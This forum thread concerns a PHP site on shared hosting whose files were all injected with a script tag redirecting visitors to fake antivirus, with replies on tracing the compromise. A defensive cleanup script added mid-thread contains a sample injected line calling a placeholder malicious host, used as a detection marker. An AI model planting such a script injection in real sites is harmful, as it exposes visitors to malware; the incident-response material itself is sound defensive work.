WEBSITE HIJACKED - Php code infected - HELP?

  • Context: PHP
  • Thread starter: bigdawg723
  • Tags: Code, Php
SUMMARY

The forum discussion centers on a severe website hijacking incident involving PHP code injection, where every PHP file, including those in subdomains, was compromised with a malicious redirect to a fake antivirus site. The user, Josh, suspects a vulnerability in his contact form that allows unauthorized access to his PHP files. Recommendations include searching for modified files, examining HTTP access logs, and identifying the source of the infection to prevent future attacks. The issue has been linked to vulnerabilities affecting multiple GoDaddy shared servers, despite Josh's WordPress installation being up-to-date.

PREREQUISITES
  • Understanding of PHP file structures and subdomain configurations
  • Knowledge of web server access logs and their analysis
  • Familiarity with common web vulnerabilities, particularly in PHP applications
  • Experience with file permissions and security practices in web hosting environments
NEXT STEPS
  • Investigate PHP file permissions and secure them against unauthorized modifications
  • Learn how to analyze HTTP access logs to trace potential attack vectors
  • Research common PHP vulnerabilities and how to mitigate them, focusing on input validation
  • Explore options for website security tools, such as Sucuri or Wordfence, to enhance protection
USEFUL FOR

Web developers, system administrators, and anyone managing PHP-based websites who are dealing with security vulnerabilities and seeking to prevent website hijacking incidents.

bigdawg723
WEBSITE HIJACKED - Php code infected! - HELP!?

Hey All,

I've got a major *$%#@ problem. I'm freaking out here.

Check this out.

On my website, I have a way to allow visitors... to become distributors and sell my product as well. When they become a distributor, it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.

So... not only do I have my set of about 20 php pages and a solid 20+ php includes... I have to multiply those numbers by roughly... 50 distributors or more!

Here's my problem.

EVERY, not just a few... not just the pages (also includes, etc)... not just my root directory (also all subdomains)... EVERY PHP FILE has a new line of code at the very top that is a Script to a php file (oo.php) on another website that redirects every visitor to a new site and it's one of those 'fake antivirus' programs that are, essentially, a virus in their own right.

When I first saw the redirect, I knew I was hijacked... but I assumed it was just 1 thing injected into my SQL Databases... or a simple code change or file somewhere... but it is THOUSANDS of files... and yes, I could go ahead and remove that snippet of code from each php file... but I still wouldn't know where it came from and I can only assume that the process which infected those pages still exists and would reinfect them all again in the very near future.

I'm begging you for help.

I know my contact form doesn't "close" the inputs or something... because it sends all contacts to the database table... and there's some major vulnerability there... but I couldn't find any entry in that database with any malicious code... perhaps it auto-deleted itself or something?

Please, I beg you, please lend a hand if you know anything about this.

Thank You,
Josh
 


it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.
What is "it"? Is "it" from a trusted source? I am by no means an expert with these things, but that was the first thing that got my attention.
 


First up, do a search on google for text snippets of the php line that was added. If someone else has been fighting this battle already, they'll be a good candidate to help solve the problem.

Otherwise, not enough information. Something on your site that has write access to your PHP files is either currently compromised, or is still vulnerable and was/is being attacked. What OS are you on? Do you have script access? Cron access? Who's your ISP? Has anything else been modified?

Step 1, look for non-PHP files that have been modified recently. Hopefully, you can use that to detect whether or not there's some binary file or otherwise that's sitting on your system that will re-infect you. That's dangerous. If you have some that look suspicious, quarantine them. Make them non-executable and non-readable; change the file name, whatever. There's a distinct possibility if you've got other programs that have installed themselves, that they'll try to re-install themselves, so check any config files you have. Heck, compare them to backups with your ISP.

Step 2, look for PHP files that have changed that reference the evil site in question. That is, it's possibly just a single PHP file that has write access to other PHP files, and if that PHP file is executed again, you're re-infected.

Step 3, look at your HTTP access log. See what was happening around the time that you were infected, and examine whatever relevant files were accessed during that time. Chances are, the attack started with a web request, and that's one way of trying to narrow down the point of attack. Otherwise, if the infection started in some OTHER way, talk to your ISP.

DaveE
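The three steps above, turned into something you can actually type into the shell on the hosting account. This is an added example, not DaveE's or the forum's code; it assumes a POSIX sh with find, grep, awk, sort, uniq, wc and mktemp, and it builds its own constructed fixture (a tiny fake docroot with one distributor copy, an injected first line pointing at a placeholder host, and a made-up access log) so it runs offline. The helper names (recent_non_php, injected_php_files, strip_marker, log_posts_at) are mine. On a real account you would point the functions at the real docroot and log, and run strip_marker only after Steps 1 and 3 have told you what had write access to the files.

```shell
#!/bin/sh
# Added triage example (not DaveE's or the forum's code). Assumes a POSIX sh
# with find, grep, awk, sort, uniq, wc and mktemp; everything below runs on a
# constructed fixture, not on a real hosting account.

# --- Constructed fixture -----------------------------------------------------
# A tiny fake docroot (root + one distributor copy) and a fake access log.
# MARK stands in for the injected first line; the host is a placeholder.
SITE="$(mktemp -d)"
mkdir -p "$SITE/includes" "$SITE/dist1"
MARK='<script src="http://EXAMPLE-MALICIOUS-HOST.invalid/oo.php"></script>'
printf '%s\n<?php include "includes/header.php"; ?>\n' "$MARK" > "$SITE/index.php"
printf '%s\n<?php echo "header"; ?>\n' "$MARK" > "$SITE/includes/header.php"
printf '%s\n<?php echo "distributor copy"; ?>\n' "$MARK" > "$SITE/dist1/index.php"
printf '<?php echo "clean"; ?>\n' > "$SITE/includes/footer.php"
printf 'User-agent: *\n' > "$SITE/robots.txt"
LOG="$SITE/access.log"   # constructed Apache-combined-style lines; IPs and times are made up
cat > "$LOG" <<'EOF'
203.0.113.5 - - [10/May/2010:03:14:07 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/May/2010:03:15:21 +0000] "POST /contact.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [10/May/2010:03:15:22 +0000] "POST /contact.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2010:03:16:40 +0000] "GET /dist1/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
EOF

# --- Step 1: non-PHP files touched in the last N minutes ----------------------
# Candidates for a dropper or config that would re-infect; quarantine, don't run.
recent_non_php() {   # $1 = docroot, $2 = minutes
    find "$1" -type f ! -name '*.php' -mmin "-$2" -print | sort
}

# --- Step 2: PHP files whose first line carries the injected reference --------
injected_php_files() {   # $1 = docroot, $2 = marker text
    find "$1" -type f -name '*.php' -print | while read -r f; do
        if head -n 1 "$f" | grep -qF "$2"; then printf '%s\n' "$f"; fi
    done | sort
}

# Removes the marker lines, keeping a .bak copy of each file. This is only
# cleanup: whatever had write access to the files still has to be found.
strip_marker() {   # $1 = docroot, $2 = marker text
    injected_php_files "$1" "$2" | while read -r f; do
        cp "$f" "$f.bak"
        grep -vF "$2" "$f.bak" > "$f"
    done
}

# --- Step 3: access-log hits in the window around the infection ---------------
# $2 is a timestamp prefix such as "10/May/2010:03:1"; output is a count per
# (client IP, request path) of POST requests in that window, most frequent first.
log_posts_at() {   # $1 = log file, $2 = timestamp prefix
    grep -F "[$2" "$1" | grep -F '"POST ' | awk '{print $1, $7}' | sort | uniq -c | sort -rn
}

# Stand-alone run: print what each step finds on the fixture.
echo "== recent non-PHP files =="; recent_non_php "$SITE" 10
echo "== injected PHP files ==";    injected_php_files "$SITE" "$MARK"
echo "== POSTs around 03:1x ==";    log_posts_at "$LOG" "10/May/2010:03:1"
```

The log step deliberately groups POSTs by client and path rather than grepping for the injected host name: the request that planted the line will not contain it, and a burst of POSTs to one form from one address just before the files changed is the kind of thing the post says to narrow in on.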
 


I searched for that PHP thread... found it!

http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html

Apparently this happened to "hundreds" of GoDaddy shared servers... I assume thousands!

I've never seen this before... I have a few words for GoDaddy... but they don't care, maybe time for a host switch? They said it was due to outdated versions of WordPress... mine was fully up-to-date at the time of the attack. BS

Thanks for the quick replies though!

I love this forum - more helpful than any PHP-only forum I've found thus far.
 


You have really 2 ways to go with this:

1) Delete everything and start from new
2) Figure out how and where the vulnerability occurred, fix it, and then go about fixing the database issue. Good luck.
 


Please tell me that you have shut down your site until you fix the problem.
 
